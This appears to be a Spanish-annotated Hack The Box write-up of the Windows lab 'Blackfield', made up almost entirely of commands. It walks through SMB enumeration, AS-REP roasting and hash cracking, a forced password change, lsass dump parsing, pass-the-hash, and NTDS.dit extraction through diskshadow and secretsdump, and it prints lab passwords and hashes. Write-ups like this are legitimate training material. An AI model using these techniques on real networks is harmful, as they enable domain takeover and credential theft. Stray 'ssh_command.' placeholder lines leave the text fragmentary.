Blackfield

Blackfield


HTB Windows

nmap -A -p- -oA output 10.129.229.17 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA active 10.129.229.17

nmap -sU -O -p- -oA active-udp 10.129.229.17

nikto -h 10.129.229.17:80

gobuster dir -k -u http://10.129.229.17/ -w /usr/share/wordlists/dirb/big.txt -t 100 -x .txt,

whichSystem 10.129.229.17

echo "10.129.229.17 blackfield.local" | sudo tee -a /etc/hosts

nmap -p- --open -T5 -v -n 10.129.229.17

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.129.229.17 -oG allPorts

ssh_command.

extractPorts allPorts

ssh_command.

nmap -sCV -p80,443 10.129.199.17 -oN targeted

ssh_command.

crackmapexec smb 10.129.199.17

ssh_command.

smbmap -H 10.129.199.17

smbmap -H 10.129.199.17 -u 'admin'

ssh_command.

smbclient -L 10.129.199.17 -N

ssh_command.

smbmap -H 10.129.199.17 -u 'admin' -r 'profiles$' | awk 'NF{print $NF}' > ../content/users

ssh_command.

Agregamos blackfield al etc/hosts

ssh_command.

/opt/kerbrute/kerbrute userenum --dc 10.129.199.17 -d blackfield.local users

ssh_command.

cat users.txt

ssh_command.

GetNPUsers.py blackfield.local/ -no-pass -userfile users.txt

ssh_command.

cat hash

ssh_command.

john --wordlist=/usr/share/wordlists/rockyou.txt hash

cat credentials.txt

ssh_command.

GetUserSPNs.py 'blackfield.local/support:#00^BlackKnight'

ssh_command.

crackmapexec smb 10.129.199.17 -u 'support' -p '#00^BlackKnight'

ssh_command.

smbmap -H 10.129.199.17 -u 'support' -p '#00^BlackKnight'

ssh_command.

smbmap -H 10.129.199.17 -u 'support' -p '#00^BlackKnight' -r 'profiles$/support/'

ssh_command.

ldapdomaindump -u 'blackfield.local\support' -p '#00^BlackKnight' 10.129.199.17

ssh_command.

ll

ssh_command.

firefox domain_users_by_group.html

ssh_command.

neo4j console

bloodhound

ssh_command.

bloodhound-python -c all -u 'support' -p '#00^BlackKnight' -ns 10.129.199.17 -d blackfield.local

ssh_command.

ssh_command.

Buscamos support@blackfield.local y escogemos Mark user as owned

ssh_command.

Podemos ver que se puede forceChangePassword

ssh_command.

rpcclient -U '#00^BlackKnight' 10.129.199.17

ssh_command.

crackmapexec smb 10.129.199.17 -u 'audit2020' -p 'test123$!'

ssh_command.

smbmap -H 10.129.199.17 -u 'audit2020' -p 'test123$!'

ssh_command.

smbmap -H 10.129.199.17 -u 'audit2020' -p 'test123$!' -r forensic/memory_analysis

smbmap -H 10.129.199.17 -u 'audit2020' -p 'test123$!' --download forensic/memory_analysis/lsass.zip

mv 10.129.199.17-forensic_memory_analysis_lsass.zip lsass.zip

ssh_command.

7z l lsass.zip

ssh_command.

pypykatz lsa minidump lsass.DMP

ssh_command.

Vemos las credenciales del administrador

ssh_command.

crackmapexec smb 10.129.199.17 -u 'Administrator' -H '7f1e4ff8c6a8e6b6fcae2d9c0572cd62'

ssh_command.

Tratamos con svc_backup

ssh_command.

Por ser parte de Remote Management users se puede usar winrm

crackmapexec winrm 10.129.199.17 -u 'svc_backup' -H '9658d1d1dcd9250115e2205d9f48400d'

ssh_command.

whoami

ssh_command.

reg query "hklm\software\microsoft\windows nt\currentversion" /v ProductName

ssh_command.

“type user.txt```

ssh_command.

whoami /priv

ssh_command.

mkdir Temp

reg save HKLM\system system

ssh_command.

reg save HKLM\sam sam

download C:\Temp\sam

ssh_command.

impacket-secretsdump -system system -sam sam LOCAL

ssh_command.

copy C:\Windows\NTDS\ntds.dit ntds.dit

ssh_command.

cat test.txt

ssh_command.

upload /home/cu3rv0x/Desktop/boxes/blackfield/content/test.txt

ssh_command.

diskshadow.exe /s c:\Temp\test.txt

erase test.txt

Si no se ejecuta se le agrega un espacio a cada linea en test.txt

ssh_command.

robocopy /b z:\Windows\NTDS\ . ntds.dit

ssh_command.

impacket-secretsdump -system system -ntds LOCAL

ssh_command.

crackmapexec smb 10.129.199.17 -u 'Administrator' -H '184fb5e5178480be64824d4cd53b99ee'

ssh_command.

evil-winrm -i 10.129.199.17 -u 'Administrator' -H '184fb5e5178480be64824d4cd53b99ee'

ssh_command.

© 2024 Cu3rv0x